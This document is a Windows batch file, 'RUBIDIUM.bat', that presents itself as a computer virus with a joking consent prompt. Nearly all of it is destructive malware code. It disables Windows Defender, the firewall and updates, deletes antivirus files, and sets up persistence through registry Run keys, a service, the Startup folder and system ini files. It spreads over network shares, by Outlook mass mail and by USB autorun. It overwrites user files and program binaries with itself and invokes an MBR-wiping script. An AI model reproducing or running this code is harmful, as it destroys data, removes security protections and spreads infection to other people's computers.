RUBIDIUM.bat

1. @echo off
2. color 17
3. title Rubid1um
4. cls
5. echo WelkOmE to RuB1D1uM V1ruS!
6. echo ===========================================
7. echo Are U SurE to Run This C0mPuTEr ViRuS???
8. echo RunniNg Th1s c0MputEr v1RuS mAy make Ur
9. echo c0MpuTer UnUseABle!
10. echo ===========================================
11. CHOICE /C YN /M "Press Y for Yes, N for No."
12. IF ERRORLEVEL==1 goto start
13. IF ERRORLEVEL==2 exit
14.  
15. :: oof
16.  
17. :start
18.  
19. :: UrMOm
20. net stop "SDRSVC"
21. net stop "WinDefend"
22. taskkill /f /t /im "MSASCui.exe"
23. net stop "security center"
24. netsh firewall set opmode mode-disable
25. net stop "wuauserv"
26. net stop "Windows Defender Service"
27. net stop "Windows Firewall"
28. net stop sharedaccess
29.  
30. del /Q /F C:\Program Files\alwils~1\avast4\*.*
31. del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
32. del /Q /F C:\Program Files\kasper~1\*.exe
33. del /Q /F C:\Program Files\trojan~1\*.exe
34. del /Q /F C:\Program Files\f-prot95\*.dll
35. del /Q /F C:\Program Files\tbav\*.dat
36. del /Q /F C:\Program Files\avpersonal\*.vdf
37. del /Q /F C:\Program Files\Norton~1\*.cnt
38. del /Q /F C:\Program Files\Mcafee\*.*
39. del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
40. del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
41. del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
42. del /Q /F C:\Program Files\Norton~1\*.*
43.  
44. RENAME %0 RUBIDIUM.exe
45.  
46.  
47.  
48. MOVE /e /y RUBIDIUM.exe C:\Windows
49.  
50.  
51.  
52. XCOPY "RUBIDIUM.exe" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
53.  
54.  
55. @echo off > service.bat
56. SET "NomeProcesso=RUBIDIUM.exe" >> service.bat
57. SET "NomeService=RUBIDIUM" >> service.bat
58. echo sc create %NomeService% binpath=%0 >> service.bat
59. echo sc start %NomeService% >> service.bat
60.  
61. attrib +h +r +s service.bat
62. start service.bat
63.  
64. SET i=0
65.  
66. reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Services" /t "REG_SZ" /d %0
67. attrib +h +r +s %0
68.  
69. :Internet
70. net use Z: \\192.168.1.%i%\C$
71. if exist Z: (for /f %%u in ('dir Z:\Users /b') do copy %0 "Z:\Users\%%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Services.exe"
72. mountvol Z: /d)
73. if %i% == 256 (goto Infect) else (set /a i=i+1)
74. goto worm
75. goto Internet
76.  
77. :Infect
78. for /f %%f in ('dir C:\Users\*.* /s /b') do (rename %%f *.exe)
79. for /f %%f in ('dir C:\Users\*.exe /s /b') do (copy %0 %%f)
80. goto Infect
81.  
82.  
83. :worm
84.  
85. set Slash=\
86. if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
87. del %SystemDrive%%Slash%AUTOEXEC.BAT
88. copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
89. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
90. )
91. set a=RUBIDIUM
92. copy %0 %windir%\%a%.exe
93. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
94. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
95. set b=RUBIDIUM
96. copy %0 %windir%\%b%.exe
97. echo [windows] >> %windir%\win.ini
98. echo run=%windir%\%b%.exe >> %windir%\win.ini
99. echo load=%windir%\%b%.exe >> %windir%\win.ini
100. echo [boot] >> %windir%\system.ini
101. echo shell=explorer.exe %b%.exe >> %windir%\system.ini
102. echo dim x>>%SystemDrive%\mail.vbs
103. echo on error resume next>>%SystemDrive%\mail.vbs
104. echo Set fso ="Scripting.FileSystem.Object">>%SystemDrive%\mail.vbs
105. echo Set so=CreateObject(fso)>>%SystemDrive%\mail.vbs
106. echo Set ol=CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
107. echo Set out=WScript.CreateObject("Outlook.Application")>>%SystemDrive%\mail.vbs
108. echo Set mapi = out.GetNameSpace("MAPI")>>%SystemDrive%\mail.vbs
109. echo Set a = mapi.AddressLists(1)>>%SystemDrive%\mail.vbs
110. echo Set ae=a.AddressEntries>>%SystemDrive%\mail.vbs
111. echo For x=1 To ae.Count>>%SystemDrive%\mail.vbs
112. echo Set ci=ol.CreateItem(0)>>%SystemDrive%\mail.vbs
113. echo Set Mail=ci>>%SystemDrive%\mail.vbs
114. echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)>>%SystemDrive%\mail.vbs
115. echo Mail.Subject="Cool file!!!">>%SystemDrive%\mail.vbs
116. echo Mail.Body="Hey... I found this cool file on the internet... wanna see it?">>%SystemDrive%\mail.vbs
117. echo Mail.Attachments.Add(%0)>>%SystemDrive%\mail.vbs
118. echo Mail.send>>%SystemDrive%\mail.vbs
119. echo Next>>%SystemDrive%\mail.vbs
120. echo ol.Quit>>%SystemDrive%\mail.vbs
121. start "" "%SystemDrive%\mail.vbs"
122.  
123. goto run2
124.  
125. goto worm
126.  
127.  
128. :run2
129.  
130. set Slash=\
131. if exist %SystemDrive%%Slash%AUTOEXEC.BAT (
132. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
133. del %SystemDrive%%Slash%AUTOEXEC.BAT
134. copy %0 %SystemDrive%%Slash%AUTOEXEC.BAT
135. attrib +s +r +h %SystemDrive%%Slash%AUTOEXEC.BAT
136. )
137. set a=RUBIDIUM
138. copy %0 %windir%\%a%.exe
139. reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
140. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %windir%\%a%.exe /f > nul
141. copy %0 "%userprofile%\Start Menu\Programs\Startup"
142. set b=RUBIDIUM
143. copy %0 %windir%\%b%.exe
144. echo [windows] >> %windir%\win.ini
145. echo run=%windir%\%b%.exe >> %windir%\win.ini
146. echo load=%windir%\%b%.exe >> %windir%\win.ini
147. echo [boot] >> %windir%\system.ini
148. echo shell=explorer.exe %b%.exe >> %windir%\system.ini
149.  
150. ::infmaking
151. echo [autorun] > windows.inf
152. echo ;open=Worst.exe >> windows.inf
153. echo ShellExecute=Worst.exe >> windows.inf
154. echo UseAutoPlay=1 >> windows.inf
155.  
156. :: Copy windows.inf to USB
157.  
158. xcopy /e /y windows.inf D:\
159. xcopy /e /y windows.inf E:\
160. xcopy /e /y windows.inf F:\
161. xcopy /e /y windows.inf G:\
162. xcopy /e /y windows.inf H:\
163.  
164.  
165. xcopy /e /y Worst.exe D:\
166. xcopy /e /y Worst.exe E:\
167. xcopy /e /y Worst.exe F:\
168. xcopy /e /y Worst.exe G:\
169. xcopy /e /y Worst.exe H:\
170.  
171.  
172. assoc .lnk=batfile
173. DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
174. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy /y %0 "%%j:%%k"
175.  
176. assoc .doc=batfile
177. DIR /S/B %SystemDrive%\*.doc >> InfList_doc.txt
178. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_doc.txt) do copy /y %0 "%%j:%%k"
179.  
180. assoc .txt=batfile
181. DIR /S/B %SystemDrive%\*.txt >> InfList_txt.txt
182. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_txt.txt) do copy /y %0 "%%j:%%k"
183.  
184. assoc .pdf=batfile
185. DIR /S/B %SystemDrive%\*.pdf >> InfList_pdf.txt
186. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_pdf.txt) do copy /y %0 "%%j:%%k"
187.  
188. assoc .xml=batfile
189. DIR /S/B %SystemDrive%\*.xml >> InfList_xml.txt
190. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_xml.txt) do copy /y %0 "%%j:%%k"
191.  
192. assoc .mp3=batfile
193. DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
194. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy /y %0 "%%j:%%k"
195.  
196. assoc .mp4=batfile
197. DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
198. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy /y %0 "%%j:%%k"
199.  
200. assoc .png=batfile
201. DIR /S/B %SystemDrive%\*.png >> InfList_png.txt
202. echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_png.txt) do copy /y %0 "%%j:%%k"
203.  
204. :haha
205. msg * "Rubidium is the chemical element with the symbol Rb and atomic number 37"
206. net send * "It is a very soft, whitish-grey solid in the alkali metal group, similar to potassium and cesium"
207. goto run3
208. goto haha
209.  
210. :run3
211. tskill pbrush
212. copy /y RUBIDIUM.exe C:\Windows\pbrush.exe
213.  
214. tskill excel
215. copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE"
216.  
217. tskill mspaint
218. copy /y RUBIDIUM.exe "%windir%\system32\mspaint.exe"
219.  
220. tskill WINWORD
221. copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office16\WINWORD.EXE"
222.  
223. tskill calc
224. copy /y RUBIDIUM.exe "%windir%\system32\calc.exe
225.  
226. tskill msaccess
227. copy /y RUBIDIUM.exe "%SystemDrive%\Program Files\Microsoft Office\Office10\MSACCESS.EXE"
228.  
229. tskill iexplore
230. copy /y RUBIDIUM.exe "C:\Program Files\Internet Explorer\iexplore.exe"
231.  
232. tskill safari
233. copy /y RUBIDIUM.exe "C:\Program Files\Safari\Safari.exe"
234.  
235. :: Create a new VBS file that speaks.
236.  
237. echo do > speak.vbs
238. echo CreateObject(“SAPI.SpVoice”).Speak”Rubidium is the first alkali metal in the group to have a density higher than water” >> speak.vbs
239. echo loop >> speak.vbs
240.  
241. ::Rubidiumislittleusedoutsideresearchithasbeenusedasacomponentofphotocellstoremovetracesofoxygenfromvacuumtubesandtomaketypesofglass
242.  
243. CD Desktop
244. ren *.png RUBI.DIUM
245. ren *.jpg RUBI.DIUM
246. ren *.gif RUBI.DIUM
247. ren *.docx RUBI.DIUM
248. ren *.pptx RUBI.DIUM
249. ren *.pdf RUBI.DIUM
250. ren *.txt RUBI.DIUM
251. ren *.exe RUBI.DIUM
252.  
253. start /min https://www.youtube.com/watch?v=iP6CRZdDu6o
254.  
255. Powershell.exe -executionpolicy remotesigned -File  stomp-mbr.ps1
256.  
257. timeout /T 10
258. :sup
259. cls
260. color 17
261. color 75
262. color 85
263. color 23
264. color 32
265. color 54
266. color 45
267. color 7F
268. color 7E
269. color 64
270. color 23
271. color 32
272. color 54
273. color 45
274. color 75
275. color 85
276. color 23
277. color 32
278. color 54
279. goto sup
280.  
281.